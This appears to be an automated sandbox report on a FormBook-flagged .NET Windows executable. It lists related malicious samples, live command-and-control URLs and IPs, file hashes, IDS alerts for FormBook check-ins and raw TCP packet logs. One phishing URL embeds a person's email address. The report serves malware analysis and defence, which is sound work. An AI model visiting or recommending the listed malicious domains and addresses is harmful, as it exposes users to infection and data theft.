                                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/cpgr/
                                                                                VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
                                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/cpgr/
                                                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/stx5/
                                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/k1td/
                                                                                15.197.142.173firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                • 15.197.142.173/
                                                                                7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                                • womanbelieve.net/index.php
                                                                                mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                                • womanbelieve.net/index.php
                                                                                7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                                • womanbelieve.net/index.php
                                                                                mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                                • womanbelieve.net/index.php
                                                                                vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                • womanbelieve.net/index.php
                                                                                vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                • womanbelieve.net/index.php
                                                                                http://www.acproyectosdeingenieria.comGet hashmaliciousUnknownBrowse
                                                                                • www.acproyectosdeingenieria.com/
                                                                                http://www.acproyectosdeingenieria.comGet hashmaliciousUnknownBrowse
                                                                                • www.acproyectosdeingenieria.com/
                                                                                FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                • www.marillyaffewedding.com/de94/

                                                                                Domains

                                                                                No context

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSTransferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                • 172.67.202.26
                                                                                Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                • 172.67.202.26
                                                                                RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.133.70
                                                                                Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                • 172.67.202.26
                                                                                Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                • 104.21.58.76
                                                                                MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                • 172.67.187.200
                                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.177.134
                                                                                DHL-SHIPMENT-DOCUMENT-BILL-OF-LADING-PACKING-LIST.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                • 172.67.19.24
                                                                                F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.177.134
                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                • 172.67.177.134
                                                                                COGENT-174USAnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                                                                • 50.7.187.218
                                                                                fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 38.57.189.73
                                                                                fbot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 38.10.97.97
                                                                                fbot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 154.42.81.20
                                                                                fbot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 38.89.2.58
                                                                                ZwmyzMxFKL.exeGet hashmaliciousBlackMoonBrowse
                                                                                • 206.238.43.118
                                                                                ZwmyzMxFKL.exeGet hashmaliciousBlackMoonBrowse
                                                                                • 206.238.43.118
                                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                                • 38.181.21.178
                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                • 154.49.45.52
                                                                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                • 38.166.98.107
                                                                                AMAZON-02USEPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                • 185.166.143.48
                                                                                D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                • 185.166.143.49
                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                • 18.141.10.107
                                                                                qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                • 185.166.143.50
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 108.139.47.92
                                                                                x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 54.171.230.55
                                                                                sample.shGet hashmaliciousUnknownBrowse
                                                                                • 54.171.230.55
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 3.162.174.58
                                                                                https://cp-wb-pe-2-ujft-9-kslojlj-5-gdr-3-cwge-5-h5-posg-3.vercel.app/?web=minjeong.cho@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                • 76.76.21.142
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 13.226.94.67

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                Malicious:true
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                C:\Users\user\AppData\Local\Temp\e151968

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\find.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1209886597424439
                                                                                Encrypted:false
                                                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.7584653084882875
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:file.exe
                                                                                File size:774'656 bytes
                                                                                MD5:09e5c83fa32b0bb661143784179329a0
                                                                                SHA1:0fa6b1217891055124b62ed520f63d7d2b28536e
                                                                                SHA256:1258f319f29525155f61593b7533e03ab0db3bc3fb823842a752044e80790a3c
                                                                                SHA512:a66e84088facf207e3ecc4ac5e4d7b3b2f97de60d2c5175ea806b5d17a92c8f951913eea6554eac0b64125c0aa0896702a782b5c95676e31c144ca2ed7d8e69f
                                                                                SSDEEP:12288:GCb+eCSmJJ2EuItS1zhK16BcyOUjm0/p2M5dq/A2Cv4FR3udAe4HwIjMfpoEkxDF:PCbJ4ZNgIS1UK0/pJ5AYKudaPYW3dLIE
                                                                                TLSH:13F40259231ADA17E9D61BB488A1E3B116BC2ECCA901D3178BEDBDFB3C3531574092E1
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-*Eg..............0.................. ........@.. .......................@............@................................

                                                                                File Icon

                                                                                Icon Hash:322e2e3eee6e2697

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4bc0f6
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x67452A2D [Tue Nov 26 01:53:49 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0a40x4f.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x2a6c.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000xba0fc0xba20079197fcda298a850fe5e9105fac679bcFalse0.915719180238415data7.764392398976114IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xbe0000x2a6c0x2c005cc095b9a4cf222faf588af49901b7a1False0.8670987215909091data7.468365920054706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xc20000xc0x200e018be8d9ebbc6ea3696e65329f61a53False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xbe1000x241dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9700378583017848
                                                                                RT_GROUP_ICON0xc05300x14data1.05
                                                                                RT_VERSION0xc05540x318data0.4444444444444444
                                                                                RT_MANIFEST0xc087c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-11-26T09:26:58.603302+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849761185.26.237.17080TCP
                                                                                2024-11-26T09:27:36.156305+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84971215.197.142.17380TCP
                                                                                2024-11-26T09:28:01.113609+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849717172.67.213.24980TCP
                                                                                2024-11-26T09:28:15.930091+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84972113.248.169.4880TCP
                                                                                2024-11-26T09:28:31.005926+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849725173.0.157.18780TCP
                                                                                2024-11-26T09:28:47.196730+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84972913.227.8.4580TCP
                                                                                2024-11-26T09:29:10.336980+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84973313.248.169.4880TCP
                                                                                2024-11-26T09:29:26.297337+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84973738.47.233.480TCP
                                                                                2024-11-26T09:29:41.221072+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849741199.192.23.12380TCP
                                                                                2024-11-26T09:29:56.496958+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849745104.21.36.23980TCP
                                                                                2024-11-26T09:30:13.423589+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849749208.91.197.2780TCP
                                                                                2024-11-26T09:30:28.972131+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849753199.59.243.22780TCP
                                                                                2024-11-26T09:30:44.357789+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975713.248.169.4880TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 26, 2024 09:27:34.940289974 CET4971280192.168.2.815.197.142.173
                                                                                Nov 26, 2024 09:27:35.060480118 CET804971215.197.142.173192.168.2.8
                                                                                Nov 26, 2024 09:27:35.060628891 CET4971280192.168.2.815.197.142.173
                                                                                Nov 26, 2024 09:27:35.074786901 CET4971280192.168.2.815.197.142.173
                                                                                Nov 26, 2024 09:27:35.194854021 CET804971215.197.142.173192.168.2.8
                                                                                Nov 26, 2024 09:27:36.156138897 CET804971215.197.142.173192.168.2.8
                                                                                Nov 26, 2024 09:27:36.156215906 CET804971215.197.142.173192.168.2.8
                                                                                Nov 26, 2024 09:27:36.156305075 CET4971280192.168.2.815.197.142.173
                                                                                Nov 26, 2024 09:27:36.159970999 CET4971280192.168.2.815.197.142.173
                                                                                Nov 26, 2024 09:27:36.279907942 CET804971215.197.142.173192.168.2.8
                                                                                Nov 26, 2024 09:27:51.567795038 CET4971380192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:51.687875986 CET8049713172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:51.688011885 CET4971380192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:51.709861040 CET4971380192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:51.829941988 CET8049713172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:53.014630079 CET8049713172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:53.016117096 CET8049713172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:53.016238928 CET4971380192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:53.220324993 CET4971380192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:54.287132978 CET4971480192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:54.407274961 CET8049714172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:54.407397985 CET4971480192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:54.465801001 CET4971480192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:54.586138010 CET8049714172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:55.660151958 CET8049714172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:55.661173105 CET8049714172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:55.664874077 CET4971480192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:55.970262051 CET4971480192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:57.005743027 CET4971580192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:57.125760078 CET8049715172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:57.125849962 CET4971580192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:57.140439034 CET4971580192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:57.260422945 CET8049715172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:57.260534048 CET8049715172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:58.458396912 CET8049715172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:58.458534956 CET8049715172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:58.458622932 CET4971580192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:58.642180920 CET4971580192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:59.660738945 CET4971780192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:59.780869007 CET8049717172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:27:59.780997992 CET4971780192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:59.789674997 CET4971780192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:27:59.909631968 CET8049717172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:28:01.112854004 CET8049717172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:28:01.113573074 CET8049717172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:28:01.113609076 CET4971780192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:28:01.115530968 CET4971780192.168.2.8172.67.213.249
                                                                                Nov 26, 2024 09:28:01.235403061 CET8049717172.67.213.249192.168.2.8
                                                                                Nov 26, 2024 09:28:06.662400007 CET4971880192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:06.782579899 CET804971813.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:06.782699108 CET4971880192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:06.803306103 CET4971880192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:06.924369097 CET804971813.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:07.971999884 CET804971813.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:07.972109079 CET4971880192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:08.314169884 CET4971880192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:08.434133053 CET804971813.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:09.343192101 CET4971980192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:09.463381052 CET804971913.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:09.463490963 CET4971980192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:09.477768898 CET4971980192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:09.597707987 CET804971913.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:10.607832909 CET804971913.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:10.607927084 CET4971980192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:10.985959053 CET4971980192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:11.105977058 CET804971913.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:12.004523039 CET4972080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:12.124809980 CET804972013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:12.125130892 CET4972080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:12.138510942 CET4972080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:12.259027004 CET804972013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:12.259078979 CET804972013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:13.223246098 CET804972013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:13.223335981 CET4972080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:13.642328024 CET4972080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:13.762377024 CET804972013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:14.661286116 CET4972180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:14.781807899 CET804972113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:14.781955957 CET4972180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:14.790781021 CET4972180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:14.911113977 CET804972113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:15.929868937 CET804972113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:15.929884911 CET804972113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:15.930090904 CET4972180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:15.932868958 CET4972180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:28:16.054677963 CET804972113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:28:21.582478046 CET4972280192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:21.702532053 CET8049722173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:21.702692986 CET4972280192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:21.716492891 CET4972280192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:21.836507082 CET8049722173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:22.940148115 CET8049722173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:22.940287113 CET8049722173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:22.940347910 CET4972280192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:23.220463991 CET4972280192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:24.239025116 CET4972380192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:24.359024048 CET8049723173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:24.359143019 CET4972380192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:24.373871088 CET4972380192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:24.494060993 CET8049723173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:25.600883007 CET8049723173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:25.600995064 CET8049723173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:25.601048946 CET4972380192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:25.876816988 CET4972380192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:26.896181107 CET4972480192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:27.016235113 CET8049724173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:27.016383886 CET4972480192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:27.030558109 CET4972480192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:27.150579929 CET8049724173.0.157.187192.168.2.8
